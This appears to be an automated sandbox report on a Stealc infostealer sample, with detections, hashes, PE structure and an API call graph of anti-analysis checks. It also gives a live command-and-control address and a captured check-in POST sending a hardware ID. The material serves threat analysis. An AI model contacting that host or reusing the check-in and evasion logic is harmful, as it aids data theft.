                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37Ifile.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php8file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/;file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522245
                      Start date and time:2024-09-29 15:16:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 50s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 82
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      inject.exeGet hashmaliciousRedLine, XmrigBrowse
                      • 185.215.113.22
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.9472147631246255
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'839'104 bytes
                      MD5:c4989e7909961b15e2428e4bdc416bf1
                      SHA1:6a36b4ad1ca0fce053b450cf21fe848a168870e6
                      SHA256:36453fb6acaf0514d0af6fbf8ed6b8da0372c90b713c18ef73d63b97f2ec5f53
                      SHA512:ce5efc0f50ff511898e601e08eba937d09be04ee0852a2e2260987e372b736f82dd923fa3f16724b38a376409b949545eae0c52c9d6ee4849129d4b7077241fb
                      SSDEEP:24576:wgKdD5zyIIUHgsgsCJY/uLKrFRp87pHYZwssGp67VNyuB+JHB/vnPVN2WeQD3mXH:MF2UOY/uLEXg7ssr9Q/lNO4CEUvhZ
                      TLSH:AC8533446FD380E5D0B8997BC95F9EA863B54190A4EEE0534F89A9FB053E0450B37F72
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xa98000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FDF30E2743Ah
                      pmaxsw mm3, qword ptr [ebx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      and al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x228002d3db0dc47b972ade98ae2f32d302238unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x29e0000x200525c77c2685b45eeb38313b3818c87d0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      gnrpyfds0x4fc0000x19b0000x19ac005ba81c144b20ac6757c8bc21b2b58c6aFalse0.9948069223600122data7.953723729400017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      orxvkivb0x6970000x10000x6001ebd04c432fffb9110a5ca6df22d137bFalse0.578125data4.99055856352984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6980000x30000x22006e8a32136c895b06d74a7d3412c09720False0.06571691176470588DOS executable (COM)0.6997224486146711IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-29T15:17:05.403571+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 29, 2024 15:17:04.476125956 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:04.481193066 CEST8049704185.215.113.37192.168.2.5
                      Sep 29, 2024 15:17:04.481306076 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:04.481549978 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:04.486435890 CEST8049704185.215.113.37192.168.2.5
                      Sep 29, 2024 15:17:05.173070908 CEST8049704185.215.113.37192.168.2.5
                      Sep 29, 2024 15:17:05.173132896 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:05.177233934 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:05.183305025 CEST8049704185.215.113.37192.168.2.5
                      Sep 29, 2024 15:17:05.403445005 CEST8049704185.215.113.37192.168.2.5
                      Sep 29, 2024 15:17:05.403570890 CEST4970480192.168.2.5185.215.113.37
                      Sep 29, 2024 15:17:07.888881922 CEST4970480192.168.2.5185.215.113.37

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704185.215.113.37806984C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Sep 29, 2024 15:17:04.481549978 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 29, 2024 15:17:05.173070908 CEST203INHTTP/1.1 200 OK
                      Date: Sun, 29 Sep 2024 13:17:05 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 29, 2024 15:17:05.177233934 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 37 41 30 37 38 36 32 46 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a
                      Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="hwid"927A07862F713604296297------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build"save------IJDHDGDAAAAKFIDGHJDG--
                      Sep 29, 2024 15:17:05.403445005 CEST210INHTTP/1.1 200 OK
                      Date: Sun, 29 Sep 2024 13:17:05 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:09:17:00
                      Start date:29/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x690000
                      File size:1'839'104 bytes
                      MD5 hash:C4989E7909961B15E2428E4BDC416BF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
                        execution_graph 13432 6a69f0 13477 692260 13432->13477 13456 6a6a64 13457 6aa9b0 4 API calls 13456->13457 13458 6a6a6b 13457->13458 13459 6aa9b0 4 API calls 13458->13459 13460 6a6a72 13459->13460 13461 6aa9b0 4 API calls 13460->13461 13462 6a6a79 13461->13462 13463 6aa9b0 4 API calls 13462->13463 13464 6a6a80 13463->13464 13629 6aa8a0 13464->13629 13466 6a6a89 13467 6a6b0c 13466->13467 13469 6a6ac2 OpenEventA 13466->13469 13633 6a6920 GetSystemTime 13467->13633 13471 6a6ad9 13469->13471 13472 6a6af5 CloseHandle Sleep 13469->13472 13476 6a6ae1 CreateEventA 13471->13476 13474 6a6b0a 13472->13474 13474->13466 13476->13467 13830 6945c0 13477->13830 13479 692274 13480 6945c0 2 API calls 13479->13480 13481 69228d 13480->13481 13482 6945c0 2 API calls 13481->13482 13483 6922a6 13482->13483 13484 6945c0 2 API calls 13483->13484 13485 6922bf 13484->13485 13486 6945c0 2 API calls 13485->13486 13487 6922d8 13486->13487 13488 6945c0 2 API calls 13487->13488 13489 6922f1 13488->13489 13490 6945c0 2 API calls 13489->13490 13491 69230a 13490->13491 13492 6945c0 2 API calls 13491->13492 13493 692323 13492->13493 13494 6945c0 2 API calls 13493->13494 13495 69233c 13494->13495 13496 6945c0 2 API calls 13495->13496 13497 692355 13496->13497 13498 6945c0 2 API calls 13497->13498 13499 69236e 13498->13499 13500 6945c0 2 API calls 13499->13500 13501 692387 13500->13501 13502 6945c0 2 API calls 13501->13502 13503 6923a0 13502->13503 13504 6945c0 2 API calls 13503->13504 13505 6923b9 13504->13505 13506 6945c0 2 API calls 13505->13506 13507 6923d2 13506->13507 13508 6945c0 2 API calls 13507->13508 13509 6923eb 13508->13509 13510 6945c0 2 API calls 13509->13510 13511 692404 13510->13511 13512 6945c0 2 API calls 13511->13512 13513 69241d 13512->13513 13514 6945c0 2 API calls 13513->13514 13515 692436 13514->13515 13516 6945c0 2 API calls 13515->13516 13517 69244f 13516->13517 13518 6945c0 2 API calls 13517->13518 13519 692468 13518->13519 13520 6945c0 2 API calls 13519->13520 13521 692481 13520->13521 13522 6945c0 2 API calls 13521->13522 13523 69249a 13522->13523 13524 6945c0 2 API calls 13523->13524 13525 6924b3 13524->13525 13526 6945c0 2 API calls 13525->13526 13527 6924cc 13526->13527 13528 6945c0 2 API calls 13527->13528 13529 6924e5 13528->13529 13530 6945c0 2 API calls 13529->13530 13531 6924fe 13530->13531 13532 6945c0 2 API calls 13531->13532 13533 692517 13532->13533 13534 6945c0 2 API calls 13533->13534 13535 692530 13534->13535 13536 6945c0 2 API calls 13535->13536 13537 692549 13536->13537 13538 6945c0 2 API calls 13537->13538 13539 692562 13538->13539 13540 6945c0 2 API calls 13539->13540 13541 69257b 13540->13541 13542 6945c0 2 API calls 13541->13542 13543 692594 13542->13543 13544 6945c0 2 API calls 13543->13544 13545 6925ad 13544->13545 13546 6945c0 2 API calls 13545->13546 13547 6925c6 13546->13547 13548 6945c0 2 API calls 13547->13548 13549 6925df 13548->13549 13550 6945c0 2 API calls 13549->13550 13551 6925f8 13550->13551 13552 6945c0 2 API calls 13551->13552 13553 692611 13552->13553 13554 6945c0 2 API calls 13553->13554 13555 69262a 13554->13555 13556 6945c0 2 API calls 13555->13556 13557 692643 13556->13557 13558 6945c0 2 API calls 13557->13558 13559 69265c 13558->13559 13560 6945c0 2 API calls 13559->13560 13561 692675 13560->13561 13562 6945c0 2 API calls 13561->13562 13563 69268e 13562->13563 13564 6a9860 13563->13564 13835 6a9750 GetPEB 13564->13835 13566 6a9868 13567 6a987a 13566->13567 13568 6a9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13566->13568 13571 6a988c 21 API calls 13567->13571 13569 6a9b0d 13568->13569 13570 6a9af4 GetProcAddress 13568->13570 13572 6a9b46 13569->13572 13573 6a9b16 GetProcAddress GetProcAddress 13569->13573 13570->13569 13571->13568 13574 6a9b68 13572->13574 13575 6a9b4f GetProcAddress 13572->13575 13573->13572 13576 6a9b89 13574->13576 13577 6a9b71 GetProcAddress 13574->13577 13575->13574 13578 6a9b92 GetProcAddress GetProcAddress 13576->13578 13579 6a6a00 13576->13579 13577->13576 13578->13579 13580 6aa740 13579->13580 13581 6aa750 13580->13581 13582 6a6a0d 13581->13582 13583 6aa77e lstrcpy 13581->13583 13584 6911d0 13582->13584 13583->13582 13585 6911e8 13584->13585 13586 69120f ExitProcess 13585->13586 13587 691217 13585->13587 13588 691160 GetSystemInfo 13587->13588 13589 69117c ExitProcess 13588->13589 13590 691184 13588->13590 13591 691110 GetCurrentProcess VirtualAllocExNuma 13590->13591 13592 691149 13591->13592 13593 691141 ExitProcess 13591->13593 13836 6910a0 VirtualAlloc 13592->13836 13596 691220 13840 6a89b0 13596->13840 13599 691249 13600 69129a 13599->13600 13601 691292 ExitProcess 13599->13601 13602 6a6770 GetUserDefaultLangID 13600->13602 13603 6a6792 13602->13603 13604 6a67d3 13602->13604 13603->13604 13605 6a67cb ExitProcess 13603->13605 13606 6a67ad ExitProcess 13603->13606 13607 6a67a3 ExitProcess 13603->13607 13608 6a67c1 ExitProcess 13603->13608 13609 6a67b7 ExitProcess 13603->13609 13610 691190 13604->13610 13611 6a78e0 3 API calls 13610->13611 13612 69119e 13611->13612 13613 6911cc 13612->13613 13614 6a7850 3 API calls 13612->13614 13617 6a7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13613->13617 13615 6911b7 13614->13615 13615->13613 13616 6911c4 ExitProcess 13615->13616 13618 6a6a30 13617->13618 13619 6a78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13618->13619 13620 6a6a43 13619->13620 13621 6aa9b0 13620->13621 13842 6aa710 13621->13842 13623 6aa9c1 lstrlen 13625 6aa9e0 13623->13625 13624 6aaa18 13843 6aa7a0 13624->13843 13625->13624 13627 6aa9fa lstrcpy lstrcat 13625->13627 13627->13624 13628 6aaa24 13628->13456 13631 6aa8bb 13629->13631 13630 6aa90b 13630->13466 13631->13630 13632 6aa8f9 lstrcpy 13631->13632 13632->13630 13847 6a6820 13633->13847 13635 6a698e 13636 6a6998 sscanf 13635->13636 13876 6aa800 13636->13876 13638 6a69aa SystemTimeToFileTime SystemTimeToFileTime 13639 6a69ce 13638->13639 13640 6a69e0 13638->13640 13639->13640 13641 6a69d8 ExitProcess 13639->13641 13642 6a5b10 13640->13642 13643 6a5b1d 13642->13643 13644 6aa740 lstrcpy 13643->13644 13645 6a5b2e 13644->13645 13878 6aa820 lstrlen 13645->13878 13648 6aa820 2 API calls 13649 6a5b64 13648->13649 13650 6aa820 2 API calls 13649->13650 13651 6a5b74 13650->13651 13882 6a6430 13651->13882 13654 6aa820 2 API calls 13655 6a5b93 13654->13655 13656 6aa820 2 API calls 13655->13656 13657 6a5ba0 13656->13657 13658 6aa820 2 API calls 13657->13658 13659 6a5bad 13658->13659 13660 6aa820 2 API calls 13659->13660 13661 6a5bf9 13660->13661 13891 6926a0 13661->13891 13669 6a5cc3 13670 6a6430 lstrcpy 13669->13670 13671 6a5cd5 13670->13671 13672 6aa7a0 lstrcpy 13671->13672 13673 6a5cf2 13672->13673 13674 6aa9b0 4 API calls 13673->13674 13675 6a5d0a 13674->13675 13676 6aa8a0 lstrcpy 13675->13676 13677 6a5d16 13676->13677 13678 6aa9b0 4 API calls 13677->13678 13679 6a5d3a 13678->13679 13680 6aa8a0 lstrcpy 13679->13680 13681 6a5d46 13680->13681 13682 6aa9b0 4 API calls 13681->13682 13683 6a5d6a 13682->13683 13684 6aa8a0 lstrcpy 13683->13684 13685 6a5d76 13684->13685 13686 6aa740 lstrcpy 13685->13686 13687 6a5d9e 13686->13687 14617 6a7500 GetWindowsDirectoryA 13687->14617 13690 6aa7a0 lstrcpy 13691 6a5db8 13690->13691 14627 694880 13691->14627 13693 6a5dbe 14772 6a17a0 13693->14772 13695 6a5dc6 13696 6aa740 lstrcpy 13695->13696 13697 6a5de9 13696->13697 13698 691590 lstrcpy 13697->13698 13699 6a5dfd 13698->13699 14788 695960 13699->14788 13701 6a5e03 14932 6a1050 13701->14932 13703 6a5e0e 13704 6aa740 lstrcpy 13703->13704 13705 6a5e32 13704->13705 13706 691590 lstrcpy 13705->13706 13707 6a5e46 13706->13707 13708 695960 34 API calls 13707->13708 13709 6a5e4c 13708->13709 14936 6a0d90 13709->14936 13711 6a5e57 13712 6aa740 lstrcpy 13711->13712 13713 6a5e79 13712->13713 13714 691590 lstrcpy 13713->13714 13715 6a5e8d 13714->13715 13716 695960 34 API calls 13715->13716 13717 6a5e93 13716->13717 14943 6a0f40 13717->14943 13719 6a5e9e 13720 691590 lstrcpy 13719->13720 13721 6a5eb5 13720->13721 14948 6a1a10 13721->14948 13723 6a5eba 13724 6aa740 lstrcpy 13723->13724 13725 6a5ed6 13724->13725 15292 694fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13725->15292 13727 6a5edb 13728 691590 lstrcpy 13727->13728 13729 6a5f5b 13728->13729 15299 6a0740 13729->15299 13731 6a5f60 13732 6aa740 lstrcpy 13731->13732 13733 6a5f86 13732->13733 13734 691590 lstrcpy 13733->13734 13735 6a5f9a 13734->13735 13736 695960 34 API calls 13735->13736 13737 6a5fa0 13736->13737 13831 6945d1 RtlAllocateHeap 13830->13831 13833 694621 VirtualProtect 13831->13833 13833->13479 13835->13566 13838 6910c2 codecvt 13836->13838 13837 6910fd 13837->13596 13838->13837 13839 6910e2 VirtualFree 13838->13839 13839->13837 13841 691233 GlobalMemoryStatusEx 13840->13841 13841->13599 13842->13623 13844 6aa7c2 13843->13844 13845 6aa7ec 13844->13845 13846 6aa7da lstrcpy 13844->13846 13845->13628 13846->13845 13848 6aa740 lstrcpy 13847->13848 13849 6a6833 13848->13849 13850 6aa9b0 4 API calls 13849->13850 13851 6a6845 13850->13851 13852 6aa8a0 lstrcpy 13851->13852 13853 6a684e 13852->13853 13854 6aa9b0 4 API calls 13853->13854 13855 6a6867 13854->13855 13856 6aa8a0 lstrcpy 13855->13856 13857 6a6870 13856->13857 13858 6aa9b0 4 API calls 13857->13858 13859 6a688a 13858->13859 13860 6aa8a0 lstrcpy 13859->13860 13861 6a6893 13860->13861 13862 6aa9b0 4 API calls 13861->13862 13863 6a68ac 13862->13863 13864 6aa8a0 lstrcpy 13863->13864 13865 6a68b5 13864->13865 13866 6aa9b0 4 API calls 13865->13866 13867 6a68cf 13866->13867 13868 6aa8a0 lstrcpy 13867->13868 13869 6a68d8 13868->13869 13870 6aa9b0 4 API calls 13869->13870 13871 6a68f3 13870->13871 13872 6aa8a0 lstrcpy 13871->13872 13873 6a68fc 13872->13873 13874 6aa7a0 lstrcpy 13873->13874 13875 6a6910 13874->13875 13875->13635 13877 6aa812 13876->13877 13877->13638 13880 6aa83f 13878->13880 13879 6a5b54 13879->13648 13880->13879 13881 6aa87b lstrcpy 13880->13881 13881->13879 13883 6aa8a0 lstrcpy 13882->13883 